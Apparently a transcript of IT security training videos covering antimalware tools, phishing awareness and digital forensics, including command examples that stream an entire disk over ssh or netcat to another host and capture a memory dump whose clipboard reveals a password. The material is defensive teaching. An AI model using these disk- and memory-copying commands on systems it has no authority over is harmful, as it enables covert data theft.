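As a minimal sketch of that idea, assuming a Linux host and a backup destination that stays disconnected except during the backup window (the paths are hypothetical):

# Mirror the home directories to an offline/removable backup volume
rsync -a --delete /home/ /mnt/offline-backup/home/
# Record checksums so a later restore can be verified for integrity
find /mnt/offline-backup/home -type f -exec sha256sum {} + > /mnt/offline-backup/home.sha256

Keeping the backup medium offline matters here, because ransomware will happily encrypt any backup volume it can reach with write access.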
In this video, we discussed ransomware.
[Topic title: Antimalware. The presenter is Dan Lachance.] In this video I'll demonstrate how to work with
antimalware. Antimalware is software that will try to detect, catch, and maybe quarantine or remove malicious software, whether that be in the form of a worm, a Trojan, or a virus attached to a file, and so on. And it's critical
that we have antimalware software up to date on every device on the network including smartphones. Here in
Windows 10 I'm going to go ahead and launch the Windows Defender antimalware, although there are many
different vendors that offer solutions. [Dan launches Windows Defender from the desktop. The Windows
Defender window opens which displays three tabs named Home, Update, and History. The window includes
three scan options and a Scan now button.] Here I can see that real-time protection is turned on. [The Home
tab is selected by default and options such as real-time protection and Virus and spyware definitions are
displayed. There are two links for Settings and Help in the top right-hand side section of the window.] So that
means not only will it scan for malware on either a manual or a scheduled, triggered basis, but it's always
watching what is happening on the machine. Whether I'm opening email file attachments or opening files from
inserted USB thumb drives and so on. I can also see that the virus and spyware definitions are up to date on
this machine. Down below, I can also see when the last scan was conducted. Here it says September 14th, 2016
and it was just a quick scan. Over on the right, I can manually trigger a quick, full, or customized scan on
demand.
So for example, if I were to choose Custom, and choose Scan now, I can then choose which drives and folders
that I want to scan. [The Windows Defender dialog box opens which displays the drives and folders which can
be selected for scanning. The window includes two buttons named OK and Cancel.] However, I'm going to
cancel that. Under the Update tab, [Dan clicks the Update tab which includes the update definitions
button.] we can see here our virus and spyware definition database is up to date. And we can see the date and
time at which that applies. We can also see the specific version of our virus and spyware definitions, which can
be important when troubleshooting. Now we also have a button here where we can manually click on Update
definitions. Under the History tab, [He clicks the History tab. It includes the View details button.] we'll have a
history of any quarantined, allowed, or detected items. Here I'm going to choose All detected items and I'll
click the View details button. Here we can see at one point it detected a Trojan on this machine. The alert level
was severe. This is the date on which it was detected and then, of course, it was quarantined. [The History tab
now displays the Remove all button.] Now at this point, I do have the option, of course, of removing that
Trojan from this host. In this particular software, Windows Defender, we can also click on the Settings link in
the upper right. And when I do that, [The Update & Security settings window opens. The window is divided
into two sections. The first section displays many tabs such as Windows Update, Windows Defender, and
Backup. The second section displays information related to the selection made in the first section. The
Windows Defender tab is selected by default and the second section displays many sections such as Real-time
protection, Cloud-based protection, Exclusions, Version info, and Automatic sample submission.] it spawns
the Update and Security settings here in Windows 10, where Real-time protection can be turned on or off,
where Cloud-based protection can be turned on or off. So the Cloud-based protection will send information
about detected malware on our computer to Microsoft. We also have the option, if we scroll further down, and
we do in every antimalware type of solution, we can exclude certain types of files or folders that we know will
trigger a false positive.
So I could exclude a file or a folder. [The ADD AN EXCLUSION window opens which displays sections such
as Files and folders, File types, and Processes.] Here I've got a folder I've excluded where I've got some live
hacks stored for testing purposes. We can also exclude certain file types or individual processes. Larger
networks will work with antimalware from a centralized tool. [He switches to the System Center Configuration
Manager window. The window displays many buttons such as All Objects, Saved Searches, and Close. Below
these buttons, the window is divided into two sections. The first section displays the Assets and Compliance
subsection along with tabs for Assets and Compliance, Software Library, Monitoring, and Administration. The
Assets and Compliance tab is selected by default. The second section displays information related to the
selection made in the first section. The Assets and Compliance subsection displays the Overview node which
includes many subnodes such as Device Collections, Asset Intelligence, Compliance Settings, Endpoint
Protection, and All Corporate-owned Devices.] In this case, we're looking at System Center Configuration
Manager 2012, where we've already gone to the Assets and Compliance workspace in the bottom left. In the left-hand navigator, I'm going to expand Endpoint Protection. System Center Endpoint Protection, often referred to as SCEP, is the antimalware solution included with SCCM, although it must be licensed separately.
So notice here on the left we can click on Antimalware policies. [The Endpoint protection subnode includes
subnodes such as Antimalware Policies and Windows Firewall policies.] And on the right, any antimalware
policies that were created, of course there's a default one, will be listed. So for instance, I'm going to go ahead
and double-click on the Default Client Antimalware Policy to open up its settings. [The Default Antimalware
Policy window opens. The window is divided into two sections. The first section includes many tabs such as
Definition updates, Advanced, Exclusion settings, Real-time protection, Default actions, and Scan settings.
The Scheduled scans tab is selected by default.] Where on the left, if I click Scan settings, on the right I see
Scan settings, such as whether we should be scanning email and attachments or removable devices like USB
drives. Or should we scan network drives when conducting a full scan? Should we scan archived files, and so
on. Now also, we can click Real-time protection over on the left to determine whether real-time scanning is
turned on and exactly how that is configured.
We have Exclusion settings. Under Advanced over here, we can determine whether a System Restore point should be taken on clients before the machine is cleaned, and so on. So finally, the last thing we'll talk about
with this solution is the Definition updates over here on the left. Where we can determine exactly, [He clicks
the Definition updates tab and the second section displays buttons such as Set Source, Set Paths, OK, and
Cancel.] by clicking the Set Source button, where the updates come from [The Configure Definition Update
Sources window opens. It displays many definition update sources to be contacted.] and how often they are
applied. So really, we're doing the same kind of thing that we could do on a single station. The difference
being that we're doing it centrally and it could potentially apply to thousands of computers. Because here in
SCCM, [He exits the Default Antimalware Policy window. The System Center Configuration Manager window
displays two Antimalware Policies, Default Client Antimalware policy and Toronto Antimalware Settings for
Endpoint.] when I right-click on a policy, now the default client policy doesn't give me the option to deploy it
to a specific collection. But if I've built a custom policy I can determine, [He right-clicks the custom policy
and from the shortcut menu, chooses Deploy.] by choosing Deploy, exactly which collections that these
antimalware settings will apply to. [The Select Collection dialog box opens.] The default settings apply to all
devices managed by this SCCM site. So there are enterprise-class tools to essentially work with things like
antimalware. And of course, if I go to the Monitoring workspace over here on the left, [He clicks the
Monitoring tab.] and if I expand, Reporting and Reports in the left-hand navigator, I'll see that I have some
report categories. [The Reports subnode displays many subnodes.] Some of which are related to working with
things like malware. So for example, if I were to click on Reports and then click the Search bar at the top and
then simply type in malware to search for reports that have that term in it. We can see we've got a number of
antimalware reports that we can run.
Now what about zero-day exploits? [The Enhanced Mitigation Experience Toolkit window is open. The window includes buttons named Wizard, Apps, and Trust.] Those are exploits that aren't yet known to the system owner or
vendors of hardware and software but, of course, are known to malicious users. Well, there are different tools
we can use to mitigate those types of problems. Here I have installed and launched the Enhanced Mitigation
Experience Toolkit, or EMET. This is a free Microsoft tool. Let's go ahead and expand it and work with it a
little bit. The overall purpose of this tool is to prevent vulnerabilities in our software configurations, whether
it's operating system or apps, from being exploited. Even though there might not be a specific exploit signature
for this type of activity. Here in the bottom screen of EMET, we can see the list of running processes on this host and whether or not they are running with EMET protection. We can see that none of them are. So what we're going to do then is click the Apps button up in the toolbar where we can add an
application that we want EMET to monitor. [He clicks the Apps button and the Application Configuration
window opens.] We can see some standard apps here like iexplore.exe for Internet Explorer, WordPad,
Outlook, Word, Excel, PowerPoint, Access, Publisher, and so on. What I'm going to do is click the Add
Application button way up at the top. And we're going to go here into drive C on this machine.
We're going to go to Program Files. And we're going to scroll down and go into 7-Zip where we're going to
choose the 7z.exe program to make sure that we monitor it for any kind of vulnerability exploits. 7-Zip is a
compression tool. I'm going to go ahead and click Open. And we can see that 7-Zip has been added and most
of the check marks for these mitigations are enabled. For example, ASR stands for Attack Surface Reduction.
ASR really is concerned primarily with things like browser plugins, such as Java plugins, PDF reader
plugins or Flash plugins. EAF over here on the left stands for Export Address Table Access Filtering. What
this allows EMET to do is to capture any Windows API calls that are triggered from potentially harmful or
suspicious locations, such as an ActiveScript running on a web page. So besides just antimalware we can also
use tools such as Microsoft Enhanced Mitigation Experience Toolkit to prevent bad things from happening on
a device.
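Antimalware can also be driven from the command line. The demos above used Windows tools, but as a loose parallel, here's a hedged sketch using the open source ClamAV scanner on Linux, assuming the clamav package is installed; the excluded path is hypothetical:

# Update the virus definition database
sudo freshclam
# Recursively scan home directories, skip a folder known to trigger false positives,
# and report only infected files
clamscan -r -i --exclude-dir="/home/dan/livehacks" /home

The same ideas apply as in the graphical tools: keep definitions current, scan regularly, and exclude only locations you deliberately accept the risk for.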
7. Video: User Training and Awareness (it_cscybs_11_enus_07)
After completing this video, you will be able to explain why user training and awareness is one of the most
important security defenses.
Objectives
explain why user training and awareness is one of the most important security defenses
[Topic title: User Training and Awareness. The presenter is Dan Lachance.] Many network infections still
occur from inside the network and not necessarily due to malicious users, but rather a lack of user awareness.
In this video, we'll talk about user training and awareness, which really turns out to be the single most effective
defense against threats. During user onboarding when we are hiring new employees, whether they be IT
technicians or not, it doesn't matter, everyone needs to be involved. User onboarding needs to include security
documentation for new employees, as well as training about security threats. We might also conduct ongoing
lunch and learn sessions for existing employees since the threat landscape is ever changing. We might also
have colorful and interesting and fun IT security posters in the office to increase general awareness about
security threats. We might also include some kind of a security tips and hints web site. Also, monthly company
newsletters are often done in larger organizations. They have news about the organization, maybe employee
birthday announcements. But they should also include some information about security awareness. So ongoing
IT security awareness and training is absolutely paramount. Now what should users do about this? Well,
through their awareness training, they should be made aware of social engineering. Essentially, it might be cynical, but users must adopt the mindset that everybody is trying to trick them. Because in this day and
age of digital communications, it's quite easy to receive an SMS text message on your phone that you didn't
ask for or the same thing is true of receiving an email message in your inbox that you didn't ask for.
So therefore users need to be vigilant about suspicious people, physically, that they might notice on a property
or in the building, but also suspicious about computer activity. So therefore, part of user training and
awareness needs to include who should be notified when suspicious people or computer activity is noticed.
Users must also be trained to pay attention to free software installation options, where additional software
might be installed, including spyware. Now in some cases, many corporate enterprises will prevent the
installation of user software, unless performed by an IT technician. Then there's always the telling of others
about IT security to spread the word about what to watch out for. Pictured on the screen, we can see a
screenshot of somebody downloading a file attachment, which apparently comes from Western Union for a
money transfer. But we can see the antivirus message about this being a Trojan. [He switches to the MS
Outlook window where an inbox is displayed.] Consider on the screen this email message that appears to be
from the Bank of Montreal or BMO, that tells me in the subject line that login has been disabled, along with the date and time. Now if I click to open up that email message, I can see the details of that message. Now, take a
look up at the email address up at the top, utah.edu. That doesn't look like it's coming from the Bank of
Montreal Internet domain name. Here it tells me that my online web portal login has been temporarily disabled
due to too many unsuccessful login attempts.
So my bank account is locked and so are all of my funds, and I've got a nice convenient link here I can click to
reset my password so I can continue with online banking with Bank of Montreal. Of course, the strange thing
is, I am not a Bank of Montreal member and even if I was, banks and law enforcement agencies and
government agencies will never contact you in this way asking you to click a link. It just doesn't happen, the
problem is a lot of people don't know this. So what should users watch out for? Users should not download
BitTorrent files or hastily install free software without reading the terms of agreement or installing additional
plug-ins. Users should never visit illegal web sites of any kind. They should never open unexpected email file
attachments or click links in email messages, especially if it's not something that they asked for. Now, in some
cases when you try to login to a web site, if you forget your password, you'll click the Forgot Password link.
And it will send an email message to reset the account to your email address. In that case, you triggered it, but
if you get email messages about resetting passwords that you didn't ask for, it's a scam.
So users must never be fooled by this and if they're not sure, they need to contact the help desk to find out if
it's legitimate or not. Other security awareness topics for users include physical security, such as making sure
they don't leave sensitive documents on the top of their desks. Making sure that they use lockdown cables for
laptop computers and that they don't leave USB thumb drives or smartphones in airports or forget them on
coffee tables at coffee shops. So we need a clean desk policy and password security, and the shared use of work devices should always be discouraged. Wireless network security must be made known to users in the sense that it's very easy
for a malicious user to create a rogue access point that looks like a legitimate wireless access point. Once the
user associates with that access point, the attacker potentially could see sensitive information that the user is
sending through that wireless access point. We now know of the danger of phishing email messages because
we've looked at a few examples here. And, of course, we know about malware and how it can be delivered and
once a machine is infected what it might do, such as spying on your computing habits or encrypting files that
you have write access to. In this video, we talked about user training and awareness.
After completing this video, you will be able to describe digital forensics.
Objectives
[Topic title: Digital Forensics Overview. The presenter is Dan Lachance.] In this video, we'll have a chat
about digital forensics. Digital forensics is the collection and investigation of digital data. The term triage
relates to this in that it allows for the prioritization of forensic tasks. Whether we are going to a suspect's
premises to seize equipment, or data on the equipment, or even trying to seize data stored in the cloud. The
integrity of evidence needs to be maintained. We must follow the chain of custody so that we can always track
who had access to collected evidence and where and how it was stored. Hashing allows us to get a unique
value for data that can be used in the future to detect changes. So therefore, we can verify a hash prior to
analysis of seized data to ensure that it matches the acquisition hash, so we know that nothing's been changed.
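For instance, on a Linux forensic workstation, recording an acquisition hash and checking it again later might look like this minimal sketch (the image file name is hypothetical):

# Record the hash at acquisition time
sha256sum disk1.img > disk1.img.sha256
# Later, before analysis, verify that nothing has changed
sha256sum -c disk1.img.sha256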
We can also use tamper-proof seals for physical evidence to ensure that both data and equipment are kept safe. All activities need to be documented when gathering and then storing evidence. Data sources for digital forensics
include network transmissions, log files, data files, even the swap files that are used for temporary storage of memory pages, as well as active memory (RAM) pages, which could include information about active network connections or processes running at a specific point in time, which could be crucial in getting some kind of a conviction in a court of law.
Naturally, if we are going to use these data sources they have to be trustworthy as do the date and timestamps
associated with them. Other data sources include disk partition tables, the contents of boot sectors, file
allocation tables, which are used for every file system on a disk partition. Things like cloud backups might be
used. So if we seize a suspect's mobile phone, for example, there might not be anything incriminating on it, but
if we track its access to cloud services, there might be something that was backed up to the cloud that could be
of value. And in some cases, cloud backups are automated, which might even be unknown to a suspect. Then
of course, digital forensic media can gather data from removable media, which includes USB thumb drives and
external hard disks and so on. Forensic analysis then analyzes the data after we've got an acquisition hash.
Now, the term big data is being thrown around a lot these days, and it refers to the large volumes of data that
must be processed to look for something meaningful. And that certainly applies to forensic analysis because
depending on how much data is gathered, there is a specific amount of time that's required to parse and
produce results from those large data sets. So often what gets used in forensic analysis are some kind of
clustering solution such as BinaryPig on Hadoop clusters, where we've got multiple computers working
together to process data.
And this is also easily deployed in the cloud where we can very quickly spin up clusters for big data forensic
analysis, and once it's finished, we can then deprovision it so we're no longer paying for the use of that
clustering service. For example, consider the Amazon Web Services that are available with users that have
accounts to Amazon Web Services. [He switches to the amazon web services web page. The page is divided
into two sections. The first section displays many subsections such as Compute, Developer tools, Analytics,
and Internet of things. The second section displays subsections such as Resource Groups and Additional
Resources.] If I scroll down on the main page under Analytics, I can click on EMR, which is Elastic Map
Reduce, which is a managed Hadoop framework to basically run large scale analytics on large data sets [He
clicks the EMR icon.] . So from here I can click on the Create cluster button to begin defining my
configuration to process large volumes of data, [The page displays information on the Amazon Elastic
MapReduce.] which could be very useful for forensic analysis. In this video, we discussed digital forensics.
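The same kind of cluster could also be provisioned from the AWS command line interface; a hedged sketch, with the name, release label, and instance sizing chosen purely for illustration:

# Spin up a small managed Hadoop (EMR) cluster for a big data analysis job
aws emr create-cluster \
  --name "forensic-analysis" \
  --release-label emr-5.30.0 \
  --applications Name=Hadoop \
  --instance-type m5.xlarge \
  --instance-count 3 \
  --use-default-roles
# Deprovision it when the analysis is complete so we stop paying for it
aws emr terminate-clusters --cluster-ids <cluster-id>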
During this video, you will learn how to determine which forensic hardware is best suited for a specific
situation.
Objectives
In this video, you will learn how to determine which forensic software is best suited for a specific situation.
Objectives
[Topic title: Digital Forensics Software. The presenter is Dan Lachance.] Just like a carpenter requires a
toolbox with the correct tools to ply their trade, the same thing is true of a digital forensics analyst. They need
the correct hardware and software. In this video, we're going to talk about digital forensics software. So besides having the correct hardware for disk imaging, or even things like crime tape to seal off a scene, at the software level there are some commonalities within digital forensics software. Most of them will support write blocking to protect against any changes being made to originating data, and change detection is often handled through file and metadata hashing. A hash is a unique value based on the state of data, in this case, when it was acquired. And we want to
do that before we perform any kind of data analytics on acquired evidence. So, commonalities of digital
forensics software also includes the preservation of original evidence, safekeeping and tracking and correct
date and timestamps. So often this will be conducted from a digital forensic workstation, which might also perform OS and process analysis, looking for anomalies or looking to date and timestamp the state of an
operating system and running processes at the time of evidence acquisition. There's also, in the same way, file
system and RAM analysis at the time of evidence acquisition. Some digital forensics software that can be used
is built in to operating systems like the standard UNIX and Linux dd, or disk dump command. This can also be
used locally, as well as remotely over the network, where we can capture slack and unallocated space on a
disk, not just capturing what's in use. This way we can track things that were removed in the past.
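Because dd writes to standard output when no output file is given, the captured data can also be streamed straight to another host, as the next sentence mentions; a minimal hedged sketch using netcat, with the host name and port chosen for illustration:

# On the forensic workstation, listen and write whatever arrives to an image file
nc -l -p 9999 > /acquired/disk1.img
# On the suspect system, stream the entire disk to that listener
dd if=/dev/sda | nc forensic-host 9999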
We can also send captured data using disk dump to a specific TCP or UDP port. Pictured in our
example, [Dan refers to the following code: ssh root@<IP address> dd if=/dev/sda of=/acquired/disk1.img. Code ends.] we can see over the network a forensic analyst executing the ssh command to connect as root over the
network to a device with a specific IP address and then remotely running the dd command. Now the dd
command specifies an input file (if), in this case /dev/sda, the entire disk, and an output file (of),
where we're storing data in an image file called disk1.img in an acquired folder. Now you must be careful
when gathering evidence as to where you store this. Here it's being stored on the remote machine that we're SSHing into. But any forensic analysis that captures the state of network connections and so on must also account for the fact that we are connecting over the network to gather this evidence. FTK, the Forensic Toolkit, is a widely used toolkit that includes many different forensic analysis tools, such as
those related to disk scanning, deleted file recovery. It supports disk imaging and hashing. It also supports
distributed processing for processing big datasets when we're conducting forensic analysis. This can be used to
reduce case processing time. EnCase is another popular digital forensics tool suite that contains things that
support automation by exposing APIs.
It supports eDiscovery, or electronic discovery, of evidence and also forensic data recovery and analysis. The
BlackBag MacQuisition tool is for Macintosh forensic imaging and analysis for MacBook Pros and MacBooks
and MacBook Air devices. However, it's not designed to acquire data from iPhones or iPads. The X1 Social
Discovery tool is also another eDiscovery tool focused on social media content. As related to sites like
Facebook, Twitter, and LinkedIn to name just a few, as well as visited websites and YouTube activity. Other
common forensic software titles include various password crackers, such as Cain and Abel, or the Helix tool,
the Sysinternals Suite, and Cellebrite. In this video, we talked about digital forensics software.
After completing this video, you will be able to explain how forensic tools can be used against data stored on
media.
Objectives
explain how forensic tools can be used against data stored on media
[Topic title: Digital Forensics and Data at Rest. The presenter is Dan Lachance.] In this video, I'll talk about
digital forensics and data at rest. Data at rest is data that is stored on some kind of storage media. Often, when
we conduct forensic analysis and evidence gathering, we must use specifically approved tools. For example,
we might have to use EnCase or the Forensic Toolkit imager tool. What we must do when we gather data at rest
for evidence is encrypt forensic images for safe keeping. We must also follow the chain of custody to ensure
that all activity related to gathered evidence, where it's stored, how it's stored, who had access to it, this all
must be logged diligently. Otherwise, the data might be deemed inadmissible in a court of law. Forensic
images can then be mounted for analysis purposes. Now, the options and visibility of the data when that
forensic image is mounted, really depends on the tool that's being used to mount the forensic image. A forensic
clone is a duplicate of a disk, whereas a forensic image is a file that contains a duplicate of the data from a
source disk. Now, forensic images are much more common than forensic clones.
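As a small sketch of the mounting step on Linux, assuming a raw image that contains a single file system (paths are hypothetical):

# Mount the image read-only through a loop device so nothing on it can be altered
sudo mkdir -p /mnt/evidence
sudo mount -o ro,loop disk1.img /mnt/evidence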
The EnCase file format, for example, is very common; it uses an E01 evidence file image format.
Forensic disk images can be taken of the traditional hard disk drives, or HDDs, which are the traditional
magnetic hard disks with spinning platters, or the newer SSDs, or solid state drives. Forensic disk images are a
bit-level copy of a disk partition that reflects the file system at a specific point in time. It also includes slack and unallocated space on the disk, which can be useful to see deleted file remnants. Timestamps are crucial, in the sense that they must come from a trusted time source. It's also important that file hashes are taken of acquired data before we actually analyze the data and potentially make changes, despite the fact that we might
be using hardware or software write-blockers. With digital forensics and data at rest analysis, live imaging
means that the system is not powered down when we are acquiring disk images. Now, this is crucial if disk
encryption is in use on a suspect's machine and we don't have the decryption key.
Many disk encryption solutions protect data at rest when the system is powered down or if someone physically
steals the disk. But when the operating system is up and running, often, the disk volume contents are decrypted
and are therefore usable as usual. Dead imaging refers to the acquisition or analysis of disk data when the
system is powered down. So, often, the disk is removed and disconnected from that station and instead
connected to a forensic station. Now, hardware and software write-blockers can prevent data alterations when
we make a copy of that data. In this video, we discussed digital forensics and data at rest.
[Topic title: Common Digital Forensic Tools. The presenter is Dan Lachance.] In this video, I'll talk about
common digital forensic tools. So, why are there specific forensic tools? Well, first of all, they're often used for evidence gathering, whether it's hardware or software. And at the same time, we need to adhere to the chain of custody, where access to acquired evidence, and how data is acquired for evidence, is documented along every step. There's also the trustworthiness of data that is gathered, to make sure that we know we've got the original data and we can track whether or not it's been modified. And also having a trustworthy date and time stamp
source. There are open and closed source tools that can be used for digital forensic analysis. Forensic tool
categories begin with image capturing. Tools that do this work with things like storage media, whether it's an
external USB drive, an internal disk array, or an SD card and so on, where often, they are hashed. Now, by
hashing an entire file system, we are generating unique values for everything on that file system, all the files,
so that if there are any changes made in the future, we can detect that changes were made. There are also ways
to capture volatile memory or RAM contents, physical memory. So we can acquire that locally. For instance,
by running a tool on a machine that's on, acquiring a memory dump and perhaps storing it on removable
media. Or, the memory dump data could be sent over the network to another host.
There are also email forensic tools. Part of what they will do is take a look at SMTP headers. SMTP headers
are essentially metadata about the email message, including the path that was used to send it. And sometimes,
different mail systems will form SMTP headers in different ways. And we might even check to see how the
fields in the SMTP header are constructed to determine if the SMTP message in fact was forged. There are also
ways and tools to take a look at encrypted and digitally signed messages and to take a look at the safekeeping of
private keys. Private keys are used to actually create a digital signature, which is used to verify the authenticity
of a message. And private keys are also used to decrypt messages encrypted to an individual. Other forensic
tool categories relate to the database level, where we can dig down into the database and its tables and look at
the data itself and also the metadata. We can also determine if row updates occurred and who did them. And
we can also analyze specific transactions used by a back-end database system. Network forensic tools are
designed to capture network traffic, but their placement on the network can be important so that they're
capturing the appropriate traffic.
For example, in a standard Ethernet switched environment, when we're plugged into one port in the switch, we
only see the traffic sent to that port from other devices on the network. Of course, that's besides multicasts and
broadcasts. We also have to bear in mind the ease with which packets can be spoofed using freely available
tools when we are capturing traffic for forensic analysis. Other forensics tools categories can include mobile
devices. Where we've got tools that can actually take a copy and hash of SIM card contents. Most mobile
devices these days also have some form of cloud backup. So, often, a digital forensics investigator will have to
take a look at any cloud account information that was synchronized from that mobile device up into the cloud.
A Faraday bag, or cage, is used to make sure that no signals can be transmitted or received by the wireless device. Finally, we might even take a look at the carriers themselves, for example, a telecom carrier, and ask for their logs related to activity on a given smartphone. There are built-in operating system
tools that we can use for things like forensic analysis. So think, for example, of the Unix and Linux dd or disk
dump command, which can actually be used to take a copy of an entire disk or partition. There's also the built-
in Unix or Linux md5sum command, which may vary from one distribution to another, that allows us to take a file hash. On the Windows side, we can use the Get-FileHash PowerShell cmdlet to take a hash of a
file. Then of course, there are numerous external tools that can be used by forensic analysts, including Encase,
the forensic toolkit or FTK, and Helix. In this video, we talked about common digital forensic tools.
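As a quick footnote to the network forensics category mentioned above, the raw capture itself is often as simple as this hedged sketch (the interface and file names are assumptions; correct placement on the network is the harder part):

# Capture all traffic seen on eth0 to a pcap file for later analysis
sudo tcpdump -i eth0 -w /captures/case42.pcap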
After completing this video, you will be able to explain the sequence of steps that should be followed when
conducting mobile device forensics.
Objectives
explain the sequence of steps that should be followed when conducting mobile device forensics
[Topic title: Mobile Device Forensics. The presenter is Dan Lachance.] In this video, we'll have a chat about
mobile device forensics. When we have a locked phone that we need to gather evidence from, it can present a
problem, because attempting to unlock the phone itself will change the device data. Web browser cookies are one example: on an iPhone, the Safari web browser stores cookies in /private/var/mobile/Library, and they can be viewed with a hex editor or an iPhone extractor tool. There's also the call history on a mobile device. For example, iOS uses SQLite data stored in /private/var/Library/CallHistory to store call data. Now, interestingly, when
it comes to locked phones, it really depends how important it is to law enforcement to get into it. If you think
about the fact that the FBI in 2016 paid a company $1 million as a one-time fee to be able to break into the San
Bernardino shooter's iPhone. Other data sources for mobile device forensics includes the memory on the
phone, as it's running.
Internal and removable storage media. Network traffic into and out of the mobile device. Logs for things like
the operating system of the mobile phone as well as for apps. SMS text messages. SIM card contents, which
could include phonebook entries, as well as SMS messages. So we should be able to create an image of an
entire mobile device file system and generate hashes before we start analyzing that acquired data. Common Android tools related to forensics include Logcat, ClockworkMod Recovery, the Linux Memory Extractor, and the Android SDK (a brief adb sketch follows at the end of this topic). Now some tools may require rooting the device so that they have full access to the
device. Common iOS tools for Apple mobile devices include iTunes Backup. So, just because we seized an
iPhone for example, and there's no relevant data that we can see on the device, perhaps that data existed in the
past and was backed up through iTunes Backup in the cloud. There's also other tools for iOS devices, like the
iPhone Analyzer, iPhone Explorer and various tools available with the Lantern Forensics suite. On the iOS
side, some tools might actually require jailbreaking the device so it has full access to the iOS device. In this
video, we chatted about mobile device forensics.
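As the brief follow-on promised above, pulling data with the Android SDK's adb tool might look like this hedged sketch, assuming USB debugging is enabled on the handset and that the paths are purely illustrative:

# Confirm the device is visible to the workstation
adb devices
# Copy external storage contents to the forensic workstation
adb pull /sdcard/ ./evidence/sdcard/
# Hash what was collected so later changes can be detected
find ./evidence/sdcard -type f -exec sha256sum {} + > evidence-sdcard.sha256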
[Topic title: Creating a Physical Memory Dump. The presenter is Dan Lachance.] During forensic evidence
gathering, it can sometimes be critical that we capture an image of what was happening in memory, electronic
memory or RAM at the time that evidence was seized. There are many ways we can do that and in this video,
we're going to learn how to create a physical memory dump. Now there are plenty of tools that will run on
Windows, Unix, and Linux. Some of the tools might run off a USB thumb drive that you plug into the machine
itself, whose memory you want to get a dump from. And then maybe you would store the memory dump on a
USB removable drive or send it over the network. [The root@kali window is open.] The way that we're going
to do it here is we're going to begin in Kali Linux using a Netcat listener, or nc as you can see with the
command. We're going to listen for connections over the network where we can receive a memory dump taken
of a machine elsewhere. So the command here in Kali Linux is nc, for Netcat, -l for listen, -vvv. Basically, the
more Vs you have, the more verbose the output is, believe it or not. -p for the listening port, which here is
going to be 8888. And then that's followed by the redirection symbol, the greater than sign. So that we're
redirecting whatever we receive through this port to a file on this Linux host called clientmemdump1.dd. Let's
go ahead and press Enter to start that listener on Kali Linux. And now it says listening on [any], which means
any interface on port 8888. So I'm looking at a Windows machine where Internet Explorer is connected to a
banking website. [The rbc.com web site is open in Internet Explorer.] What we want to do is get a memory
dump of this machine. So there are many ways to do that. What we are going to do is go to the Start menu and
go to My Computer, where we've got a tool that was downloaded than can actually acquire a memory dump
and send it somewhere, like over the network.
And that tool is called Helix. [Dan clicks the icon for the Helix tool.] If I go ahead and run the Helix tool it
gives me a warning [The wizard is open.] that says the fact that you're running this tool is modifying this
system. So when you're gathering evidence, that is important to note and it must be documented. I'll accept that
by clicking the Accept button. And I'm going to click the Camera icon on the left to acquire a live image. The
Source up here is PhysicalMemory, of which there is a little over 500 MB worth. I want to send it over to a
NetCat location. So I'm gonna put in the IP address of our Kali Linux host which is listening on port 8888.
And I'll click Acquire. So it asks me if this is okay, if I want to do this, I'm going to click Yes. And now it says
it's copying to physical memory. [The command prompt window opens with the message Copying physical
memory.] Of course it's copying it over the network to our Linux host. Back here in Kali Linux, we can see in
fact that we've got a connection from a host called 192.168.1.242. Well, that's actually not what it's called, but
that is its IP address. So now it's just a matter of waiting until we receive the entire memory dump before we
can analyze it using a different tool called Volatility. We can now see in Linux that it received a number of
bytes. And if we type ls, we'll see the existence of our clientmemdump1.dd file. So the next thing we'll do is
use a different tool, and that's going to be Volatility, to analyze that file.
So with Volatility, I'm going to use -f for file. I'll specify the file name. And the first thing we'll start off with is
asking it to give us just a little bit of image information about that memory dump image. Depending on the
amount of memory gathered, that might take just a few seconds or it might take a few minutes. Okay, so it
looks like, next to Suggested Profile(s), it's a Windows XP machine. And further down, the Number of
Processors is set to 1. And then we have image date and time stamp information listed down below. I'm going
to use the up-arrow key to bring up that Volatility command again. Except, instead of imageinfo as the last
parameter, this time we're going to use pslist to give us a list of running processes at the time that the memory
dump was acquired. And sometimes that can be absolutely crucial when it comes to evidence in a specific
case. So we have a list of the processes here, and of course we see the date and time stamps over on the far
right. Let's clear the screen and bring up that command again. And let's change the last parameter from pslist in
this case to connscan to show any active connections, again, at the time that the memory dump was acquired.
Here we can see we have numerous connections to something on port 80, [A list of connections is
displayed.] we can see IP addresses. Now of course, there are ways that we can conduct reverse lookups.
For instance, using nslookup, which I can do here in Linux. I can set type=ptr to do a reverse pointer lookup,
and maybe I'll pop in the first IP address I see here. [He enters the IP address 23.34.200.121.] And then I get
answers back that are listed from that. I get a non-authoritative answer, which means it came from a DNS server that is not authoritative for that zone, such as a caching server. You can see that we've issued the volatility command against our dump file again. But we've used
as a last parameter clipboard to show us the contents of what was copied in memory. [A table with column
headers such as Session, WindowStation Format, Handle, Object, and Data is displayed.] And notice that
under the Data column on the right it looks like we've got some kind of variation of my dog has fleas, which
appears to be some kind of a password. So we can start gathering some very detailed information from what
was happening within a memory dump at the time that it was acquired. In this video, we learned how to create
a physical memory dump.
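To recap the command-line side of that demo in one place, the listener and analysis steps looked roughly like this; treat it as a sketch, since the file name and port simply match the narration, and depending on the Volatility version you may also need to pass a --profile option:

# On Kali Linux: listen on TCP 8888 and save whatever arrives as a memory image
nc -l -vvv -p 8888 > clientmemdump1.dd
# (The memory dump is then acquired on the Windows host with Helix and sent here.)

# Analyze the dump with Volatility
volatility -f clientmemdump1.dd imageinfo   # suggest an OS profile, show timestamps
volatility -f clientmemdump1.dd pslist      # processes running at acquisition time
volatility -f clientmemdump1.dd connscan    # network connections at acquisition time
volatility -f clientmemdump1.dd clipboard   # clipboard contents captured in memory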
[Topic title: Viewing Deleted Files on a Hard Disk. The presenter is Dan Lachance.] In this video I'll
demonstrate how to view deleted files on a hard disk. [The Restoration folder is open in the Windows File
Explorer. It displays files such as DLL16.DLL, DLL32.DLL, file_id.diz, FreePC.rtf, and
Restoration.exe.] Most of us know that when we delete a file it actually just goes into the Recycle Bin, at least
on the Windows platform. And, of course, if we empty the Recycle Bin, the file appears to be gone forever. Of
course, that's not the case. Files are always retrievable even if you repartition a disk, let alone format the file
system on that partition. And that's why it's important that we use the appropriate disk scrubbing or cleansing
tools to wipe the content from the disk appropriately. And depending on the industry we're in, there might only
approved tools that we're allowed to use to do that. Here I've downloaded and have available a free file
restoration tools for the Windows platform. So I'm going to go ahead and open up this Restoration
program. [The Restoration Version 3.2.13 window opens. It is divided into two sections. The first section
displays many column headers such as name, In Folder, Size, and Modified. The second section displays the
Drives drop-down list box, buttons named Search Deleted Files, Restore by Copying, and Exit. The All or part
of the file textbox is also displayed.] And I'm going to leave it on drive C, and I'll click the Search Deleted
